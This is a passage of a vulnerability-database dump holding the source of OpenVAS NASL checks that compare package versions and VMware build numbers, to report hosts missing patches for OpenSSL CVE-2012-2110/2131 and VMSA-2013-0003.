script_tag(name:\"vuldetect\", value:\"Check the build number.\");\n script_tag(name:\"insight\", value:\"VMware has updated VMware vCenter Server, ESXi and ESX to address\na vulnerability in the Network File Copy (NFC) Protocol. This update\nalso addresses multiple security vulnerabilities in third party\nlibraries used by VirtualCenter, ESX and ESXi.\n\nProblem Description\n\na. VMware vCenter, ESXi and ESX NFC protocol memory corruption\n vulnerability\n\nVMware vCenter Server, ESXi and ESX contain a vulnerability in the\nhandling of the Network File Copy (NFC) protocol. To exploit this\nvulnerability, an attacker must intercept and modify the NFC\ntraffic between vCenter Server and the client or ESXi/ESX and the\nclient. Exploitation of the issue may lead to code execution.\n\nTo reduce the likelihood of exploitation, vSphere components should\nbe deployed on an isolated management network.\n\nb. VirtualCenter, ESX and ESXi Oracle (Sun) JRE update 1.5.0_38\n\nOracle (Sun) JRE is updated to version 1.5.0_38, which addresses\nmultiple security issues that existed in earlier releases of\nOracle (Sun) JRE.\n\nOracle has documented the CVE identifiers that are addressed\nin JRE 1.5.0_38 in the Oracle Java SE Critical Patch Update\nAdvisory of October 2012.\n\nc. Update to ESX service console OpenSSL RPM\n\nThe service console OpenSSL RPM is updated to version\nopenssl-0.9.7a.33.28.i686 to resolve multiple security issues.\");\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n script_tag(name:\"summary\", value:\"The remote ESXi is missing one or more security related Updates from VMSA-2013-0003.\");\n script_tag(name:\"affected\", value:\"VMware vCenter Server 5.1 prior to 5.1.0b\nVMware vCenter Server 5.0 prior to 5.0 Update 2\nVMware vCenter Server 4.0 prior to Update 4b\nVMware VirtualCenter 2.5 prior to Update 6c\n\nVMware ESXi 5.1 without ESXi510-201212101-SG\nVMware ESXi 5.0 without ESXi500-201212102-SG\nVMware ESXi 4.1 without ESXi410-201301401-SG\nVMware ESXi 4.0 without ESXi400-201302401-SG\nVMware ESXi 3.5 without ESXe350-201302401-I-SG and ESXe350-201302403-C-SG\n\nVMware ESX 4.1 without ESX410-201301401-SG\nVMware ESX 4.0 without ESX400-201302401-SG\nVMware ESX 3.5 without ESX350-201302401-SG\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://lists.vmware.com/pipermail/security-announce/2013/000205.html\");\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))exit(0);\nif(!esxBuild = get_kb_item(\"VMware/ESX/build\"))exit(0);\n\nfixed_builds = make_array(\"5.0.0\",\"912577\",\n \"5.1.0\",\"911593\");\n\nif(!fixed_builds[esxVersion])exit(0);\n\nif(int(esxBuild) < int(fixed_builds[esxVersion])) {\n\n security_message(port:0, data: esxi_remote_report(ver:esxVersion, build: esxBuild, fixed_build: fixed_builds[esxVersion]));\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-19T16:08:14", "description": "The remote ESXi is missing one or more security related Updates from VMSA-2013-0003.", "cvss3": {}, "published": "2013-02-27T00:00:00", "type": "openvas", "title": "VMware ESXi/ESX address an NFC Protocol memory corruption and third party library security issues (VMSA-2013-0003)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2013-1659"], "modified": "2019-12-18T00:00:00", "id": "OPENVAS:1361412562310103672", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103672", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2013-0003 VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third party library security issues.\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103672\");\n script_cve_id(\"CVE-2013-1659\", \"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESXi/ESX address an NFC Protocol memory corruption and third party library security issues (VMSA-2013-0003)\");\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-02-27 11:04:01 +0100 (Wed, 27 Feb 2013)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n script_tag(name:\"summary\", value:\"The remote ESXi is missing one or more security related Updates from VMSA-2013-0003.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more patch(es).\");\n\n script_tag(name:\"affected\", value:\"VMware ESXi 5.1 without ESXi510-201212101-SG\n\n VMware ESXi 5.0 without ESXi500-201212102-SG\n\n VMware ESXi 4.1 without ESXi410-201301401-SG\n\n VMware ESXi 4.0 without ESXi400-201302401-SG\n\n VMware ESXi 3.5 without ESXe350-201302401-I-SG and ESXe350-201302403-C-SG\n\n VMware ESX 4.1 without ESX410-201301401-SG\n\n VMware ESX 4.0 without ESX400-201302401-SG\n\n VMware ESX 3.5 without ESX350-201302401-SG\");\n\n script_tag(name:\"insight\", value:\"a. VMware vCenter, ESXi and ESX NFC protocol memory corruption\n vulnerability\n\n VMware vCenter Server, ESXi and ESX contain a vulnerability in the\n handling of the Network File Copy (NFC) protocol. To exploit this\n vulnerability, an attacker must intercept and modify the NFC\n traffic between vCenter Server and the client or ESXi/ESX and the\n client. Exploitation of the issue may lead to code execution.\n\n To reduce the likelihood of exploitation, vSphere components should\n be deployed on an isolated management network.\n\n b. VirtualCenter, ESX and ESXi Oracle (Sun) JRE update 1.5.0_38\n\n Oracle (Sun) JRE is updated to version 1.5.0_38, which addresses\n multiple security issues that existed in earlier releases of\n Oracle (Sun) JRE.\n\n Oracle has documented the CVE identifiers that are addressed\n in JRE 1.5.0_38 in the Oracle Java SE Critical Patch Update\n Advisory of October 2012.\n\n c. Update to ESX service console OpenSSL RPM\n\n The service console OpenSSL RPM is updated to version\n openssl-0.9.7a.33.28.i686 to resolve multiple security issues.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://lists.vmware.com/pipermail/security-announce/2013/000205.html\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"4.0.0\", \"ESXi400-201302401-SG\",\n \"4.1.0\", \"ESXi410-201301401-SG\",\n \"5.0.0\", \"VIB:tools-light:5.0.0-1.25.912577\",\n \"5.1.0\", \"VIB:esx-base:5.1.0-0.8.911593\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:47", "description": "The remote host is missing an update to openssl\nannounced via advisory DSA 2454-2.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2454-2 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2131", "CVE-2012-2110"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:71261", "href": "http://plugins.openvas.org/nasl.php?oid=71261", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2454_2.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2454-2 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tomas Hoger, Red Hat, discovered that the fix for CVE-2012-2110 for\nthe 0.9.8 series of OpenSSL was incomplete. It has been assigned the\nCVE-2012-2131 identifier.\n\nFor reference, the original description of CVE-2012-2110 from DSA-2454-1\nis quoted below:\n\nCVE-2012-2110\n\nTavis Ormandy, Google Security Team, discovered a vulnerability\nin the way DER-encoded ASN.1 data is parsed that can result in\na heap overflow.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 0.9.8o-4squeeze12.\n\nThe testing distribution (wheezy), and the unstable distribution (sid),\nare not affected by this issue.\n\nWe recommend that you upgrade your openssl packages.\";\ntag_summary = \"The remote host is missing an update to openssl\nannounced via advisory DSA 2454-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202454-2\";\n\nif(description)\n{\n script_id(71261);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2012-2131\", \"CVE-2012-2110\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:57:59 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Debian Security Advisory DSA 2454-2 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libcrypto0.9.8-udeb\", ver:\"0.9.8o-4squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:11:24", "description": "The remote ESXi is missing one or more security related Updates from VMSA-2013-0003.", "cvss3": {}, "published": "2013-12-03T00:00:00", "type": "openvas", "title": "VMSA-2013-0003 VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third party library security issues. (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2013-1659"], "modified": "2017-05-09T00:00:00", "id": "OPENVAS:103849", "href": "http://plugins.openvas.org/nasl.php?oid=103849", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2013-0003_remote.nasl 6086 2017-05-09 09:03:30Z teissa $\n#\n# VMSA-2013-0003 VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third party library security issues (remote check).\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"The remote ESXi is missing one or more security related Updates from VMSA-2013-0003.\";\n\ntag_affected = \"VMware vCenter Server 5.1 prior to 5.1.0b \nVMware vCenter Server 5.0 prior to 5.0 Update 2 \nVMware vCenter Server 4.0 prior to Update 4b \nVMware VirtualCenter 2.5 prior to Update 6c\n\nVMware ESXi 5.1 without ESXi510-201212101-SG \nVMware ESXi 5.0 without ESXi500-201212102-SG \nVMware ESXi 4.1 without ESXi410-201301401-SG \nVMware ESXi 4.0 without ESXi400-201302401-SG \nVMware ESXi 3.5 without ESXe350-201302401-I-SG and ESXe350-201302403-C-SG\n\nVMware ESX 4.1 without ESX410-201301401-SG \nVMware ESX 4.0 without ESX400-201302401-SG \nVMware ESX 3.5 without ESX350-201302401-SG\";\n\ntag_insight = \"VMware has updated VMware vCenter Server, ESXi and ESX to address\na vulnerability in the Network File Copy (NFC) Protocol. This update\nalso addresses multiple security vulnerabilities in third party\nlibraries used by VirtualCenter, ESX and ESXi.\n\nProblem Description\n\na. VMware vCenter, ESXi and ESX NFC protocol memory corruption\n vulnerability\n\nVMware vCenter Server, ESXi and ESX contain a vulnerability in the\nhandling of the Network File Copy (NFC) protocol. To exploit this\nvulnerability, an attacker must intercept and modify the NFC \ntraffic between vCenter Server and the client or ESXi/ESX and the\nclient. Exploitation of the issue may lead to code execution.\n\nTo reduce the likelihood of exploitation, vSphere components should\nbe deployed on an isolated management network.\n\nb. VirtualCenter, ESX and ESXi Oracle (Sun) JRE update 1.5.0_38\n\nOracle (Sun) JRE is updated to version 1.5.0_38, which addresses\nmultiple security issues that existed in earlier releases of\nOracle (Sun) JRE. \n\nOracle has documented the CVE identifiers that are addressed\nin JRE 1.5.0_38 in the Oracle Java SE Critical Patch Update\nAdvisory of October 2012. \n\nc. Update to ESX service console OpenSSL RPM \n\nThe service console OpenSSL RPM is updated to version \nopenssl-0.9.7a.33.28.i686 to resolve multiple security issues.\";\n\ntag_solution = \"Apply the missing patch(es).\";\ntag_vuldetect = \"Check the build number.\";\n\nif (description)\n{\n script_id(103849);\n script_cve_id(\"CVE-2013-1659\",\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_version (\"$Revision: 6086 $\");\n script_name(\"VMSA-2013-0003 VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third party library security issues. (remote check)\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-09 11:03:30 +0200 (Tue, 09 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-12-03 15:04:01 +0100 (Tue, 03 Dec 2013)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esx_web_detect.nasl\");\n script_mandatory_keys(\"VMware/ESX/build\",\"VMware/ESX/version\");\n\n script_tag(name : \"vuldetect\" , value : tag_vuldetect);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://lists.vmware.com/pipermail/security-announce/2013/000205.html\");\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))exit(0);\nif(!esxBuild = get_kb_item(\"VMware/ESX/build\"))exit(0);\n\nfixed_builds = make_array(\"5.0.0\",\"912577\",\n \"5.1.0\",\"911593\");\n\nif(!fixed_builds[esxVersion])exit(0);\n\nif(int(esxBuild) < int(fixed_builds[esxVersion])) {\n\n security_message(port:0, data: esxi_remote_report(ver:esxVersion, build: esxBuild, fixed_build: fixed_builds[esxVersion]));\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:20:18", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1428-1", "cvss3": {}, "published": "2012-04-26T00:00:00", "type": "openvas", "title": "Ubuntu Update for openssl USN-1428-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2131", "CVE-2012-2110"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840987", "href": "http://plugins.openvas.org/nasl.php?oid=840987", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1428_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for openssl USN-1428-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the fix for CVE-2012-2110 was incomplete for OpenSSL\n 0.9.8. A remote attacker could trigger this flaw in services that used SSL\n to cause a denial of service or possibly execute arbitrary code with\n application privileges. Ubuntu 11.10 was not affected by this issue.\n (CVE-2012-2131)\n\n The original upstream fix for CVE-2012-2110 would cause BUF_MEM_grow_clean()\n to sometimes return the wrong error condition. This update fixes the\n problem.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1428-1\";\ntag_affected = \"openssl on Ubuntu 11.10 ,\n Ubuntu 11.04 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1428-1/\");\n script_id(840987);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-26 10:36:18 +0530 (Thu, 26 Apr 2012)\");\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"1428-1\");\n script_name(\"Ubuntu Update for openssl USN-1428-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8k-7ubuntu8.11\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.0e-2ubuntu4.5\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8o-5ubuntu1.5\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8g-4ubuntu3.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:58:04", "description": "Check for the Version of openssl0.9.8", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "openvas", "title": "Mandriva Update for openssl0.9.8 MDVSA-2012:064 (openssl0.9.8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2131", "CVE-2012-2110"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:831657", "href": "http://plugins.openvas.org/nasl.php?oid=831657", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for openssl0.9.8 MDVSA-2012:064 (openssl0.9.8)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the fix for CVE-2012-2110 (MDVSA-2012:060)\n was not sufficient to correct the issue for OpenSSL 0.9.8.\n\n The updated packages have been upgraded to the 0.9.8w version which\n is not vulnerable to this issue.\";\n\ntag_affected = \"openssl0.9.8 on Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:064\");\n script_id(831657);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:58:50 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2012:064\");\n script_name(\"Mandriva Update for openssl0.9.8 MDVSA-2012:064 (openssl0.9.8)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl0.9.8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl0.9.8\", rpm:\"libopenssl0.9.8~0.9.8w~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl0.9.8\", rpm:\"lib64openssl0.9.8~0.9.8w~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:41", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1428-1", "cvss3": {}, "published": "2012-04-26T00:00:00", "type": "openvas", "title": "Ubuntu Update for openssl USN-1428-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2131", "CVE-2012-2110"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840987", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1428_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for openssl USN-1428-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1428-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840987\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-26 10:36:18 +0530 (Thu, 26 Apr 2012)\");\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"USN\", value:\"1428-1\");\n script_name(\"Ubuntu Update for openssl USN-1428-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 